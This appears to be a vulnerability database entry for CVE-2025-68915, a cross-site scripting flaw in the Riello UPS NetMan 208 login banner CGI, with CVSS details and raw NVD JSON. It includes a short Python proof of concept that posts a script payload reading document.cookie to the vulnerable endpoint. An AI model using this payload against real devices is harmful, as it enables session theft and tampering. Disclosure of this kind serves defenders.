Security Vulnerability Report
中文
CVE-2025-68915 CVSS 5.5 MEDIUM

CVE-2025-68915

Published: 2025-12-24 20:16:09
Last Modified: 2026-01-02 18:02:40

Description

Riello UPS NetMan 208 Application before 1.12 allows cgi-bin/loginbanner_w.cgi XSS via a crafted banner.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:riello-ups:netman_208:*:*:*:*:*:*:*:* - VULNERABLE
Riello UPS NetMan 208 Application < 1.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-68915 PoC - Riello UPS NetMan XSS url = "http://target/cgi-bin/loginbanner_w.cgi" payload = "<script>alert(document.cookie)</script>" data = { "banner": payload } response = requests.post(url, data=data, auth=('admin', 'password')) print(response.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68915", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:16:08.503", "lastModified": "2026-01-02T18:02:39.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Riello UPS NetMan 208 Application before 1.12 allows cgi-bin/loginbanner_w.cgi XSS via a crafted banner."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:riello-ups:netman_208:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.12", "matchCriteriaId": "39629084-39D2-4B39-8452-3B582FB9A16D"}]}]}], "references": [{"url": "https://github.com/gerico-lab/riello-multiple-vulnerabilities-2025", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}